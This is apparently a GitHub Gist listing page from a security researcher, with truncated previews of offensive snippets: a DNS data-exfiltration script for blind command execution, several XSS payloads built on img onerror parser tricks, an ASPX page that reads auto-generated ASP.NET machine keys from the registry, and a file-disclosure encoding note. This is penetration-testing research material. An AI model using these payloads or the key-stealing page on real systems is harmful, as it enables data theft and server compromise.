irsdl
/ dns_data_exfiltration.sh
Created
October 13, 2020 09:49
A bash script that automates the exfiltration of data over dns in case we have a blind command execution on a server where all outbound connections except DNS are blocked.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| : ' | |
| Usage: | |
| ./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns | |
| Todo: | |
| 1. add support for powershell | |
| something like the following should do the trick but haven't tested it: | |
| outer_cmd_template="powershell -enc %CMD_B64%" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <img alt="<x" title="/><img src=url404 onerror=xss(0)>"> | |
| <img alt=" | |
| <x" title="/> | |
| <img src=url404 onerror=xss(1)>"> | |
| <style><style/><img src=url404 onerror=xss(2)> | |
| <xmp><xmp/><img src=url404 onerror=xss(3)> |
irsdl
/ machineKeyFinder.aspx
Last active
November 5, 2025 00:48
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%@ Page Language="C#" %> | |
| <% | |
| // Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/ | |
| Response.Write("<br/><hr/>"); | |
| byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{}); | |
| if(autoGenKeyV4!=null) | |
| Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty)); | |
| Response.Write("<br/>"); | |
| byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{}); | |
| if(autoGenKey!=null) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Convert from iso-8859-1, utf-8ed to binary! | |
| # Useful for file disclosure when encoding can be controlled | |
| # The following C# code shows an example (result is iso-8859-1, utf-8ed!): | |
| ###string encoding = "iso-8859-1"; | |
| ######string sourceFile = @"Newtonsoft.Json.dll"; | |
| ###### | |
| ######public void test() | |
| ######{ | |
| #########System.Text.Encoding myEncoding = Encoding.GetEncoding(encoding); | |
| #########String sourceFilePath = Directory.GetCurrentDirectory() + @"\" + sourceFile; |
NewerOlder